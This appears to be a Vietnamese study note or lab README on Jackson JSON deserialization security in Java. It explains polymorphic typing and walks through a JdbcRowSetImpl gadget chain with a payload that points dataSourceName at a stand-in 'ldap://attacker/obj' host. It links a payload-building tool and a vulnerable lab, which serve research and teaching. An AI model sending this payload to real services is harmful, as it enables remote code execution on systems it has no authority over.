#   Jackson - Java
> Jackson là thư viện cơ bản, phổ biến và hiệu quả để serialize hay ánh xạ Java object thành JSON và ngược lại

##   Java working Jackson 
###  Document
*   [jackson-docs](https://github.com/FasterXML/jackson-docs) -- Tài liệu Github Jackson hub
*   [Jackson Wiki](http://wiki.fasterxml.com/JacksonHome) --  Chứa nhưng tài liệu cũ ( 1.x và 2.x)
*   [CowTalk](http://cowtowncoder.com/blog/blog.html) -- Blog chứa một vài nội dung Jackson-specific 
*   [tutorialspoint.com](http://www.tutorialspoint.com/jackson/) -- Hướng đẫn sử dụng nhanh

##   Jackson security
###  Description
*   Jackson mặc định sẽ không thêm bất kỳ thông tin về kiểu dữ liệu vào serialize data. Tuy nhiên điều này là cần thiết để serialize polymorphic types và System.lang.Object.
*   Để serialize polymorphic types và System.lang.Object cần kết nối hàm enableDefaultTyping() trong object mapper hay annotating @JsonTypeInfo.
*   Jackson sử dụng conttuctor, getter và setter để lây và gán giá trị cho các trường.
*   Sự khác nhau về serialize data giữa cấu hình serialize mặc định và serialize type:

| Default                                                                   | Serialize type                                                                                      |
| --------------------------------------------------------------------------|:---------------------------------------------------------------------------------------------------:|
| Student [ name: Mahesh, age: 10 obj: {name=hatoan, age=0, obj=null}]      | {"name":"Mahesh","age":10,"obj":["com.hatoan.object.Student",{"name":"hatoan","age":0,"obj":null}]} |


### Serialize polymorphic type
*   enableDefaultTyping(option): Mặc đinh là OBJECT_AND_NON_CONCRETE
>   • JAVA_LANG_OBJECT: Áp dụng thuộc tính kiểu Object.class
    • OBJECT_AND_NON_CONCRETE: Áp dụng đối với kiểu Object.class và tất cả non-concrete types (abstract classes,interfaces)
    • NON_CONCRETE_AND_ARRAYS: Giống ở trên và tất cả array types 
    • NON_FINAL: Áp dụng được cho tất cả các kiểu mà chưa định nghĩ "final" và kiểu mảng.

*   Annotating @JsonTypeInfo
>   @JsonTypeInfo(use=JsonTypeInfo.Id.CLASS, include=JsonTypeInfo.As.PROPERTY, property="@class")
    public Object message;

### Affect
>   0bject mapper thực hiện enableDefaultTyping(option) và hoặc annotating  @JsonType
    
### Exploit  Jackson chain JdbcRowSetImpl  
1.   App code - Deserialize.

![App Code](images/app_code.PNG)
2.   Thay đổi dữ liệu json của trường obj to thành ["com.sun.rowset.JdbcRowSetImpl",{"dataSourceName":"ldap://attacker/obj","autoCommit":true}]
3.   Kết quả: {"name":"Mahesh","age":10,"obj":["com.sun.rowset.JdbcRowSetImpl",{"dataSourceName":"ldap://attacker/obj","autoCommit":true}]}
4.   Để gán giá trị cho trường dataSourceName và autoCommit chương trình sẽ gọi setterDataSourceName và setAutocommit. Hàm setAutocommit là hàm chứ lỗ hổng cho phép thực hiện khai thác.
   
![Function setAutocomit](images/setAutocomit.PNG)
5.   Sau đó hàm connect trong setAutocomit sẽ được thực hiện.
![Function connect](images/connect.PNG)

### Documents
 *   [doc](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf) --  Json attack
 *   [slider](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf) --  Json attack
 *   [tool](https://github.com/HaToan/marshalsec) -- Tool buld payload json in java

### Note
* Jackson có thể khai thác được bằng cách sử dụng các thư viện khác ví dụ: [JdbcRowset - doc](https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf), [JdbcRowset - sileder](https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE-wp.pdf)

### Setup lab
1. [Download - Lab](https://gitlab.com/HaToan/Blackhat2017/raw/master/JsonAttack/Jackson/JacksonVul/JacksonVul.zip)
2. Giải nén lab.
3. Eclipse - import project
